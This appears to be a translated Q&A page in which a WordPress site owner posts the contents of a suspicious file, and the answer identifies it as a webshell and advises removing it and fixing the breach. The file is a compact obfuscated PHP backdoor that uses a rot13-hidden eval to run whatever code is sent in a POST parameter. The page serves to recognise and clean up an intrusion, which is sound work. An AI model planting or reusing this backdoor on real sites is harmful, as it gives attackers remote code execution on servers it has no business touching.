WordPress 网站被黑?可疑的PHP文件 [英] WordPress Site hacked? Suspicious PHP file

问题描述

我发现了一个可疑的 PHP 文件/wp-includes/mera.php

I found a suspicious PHP file /wp-includes/mera.php

内容:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

@preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); 可能会做一些恶意的事情吗?

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?

推荐答案

立即删除文件！

此 PHP 代码是经过修改的 webshel​​l.这些可用于攻击其他网站，并可能导致严重的法律问题！

This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!

删除后你应该还修复让文件进入的泄漏！

After deletion you should also fix the leak that let the file in!

这篇关于WordPress 网站被黑?可疑的PHP文件的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！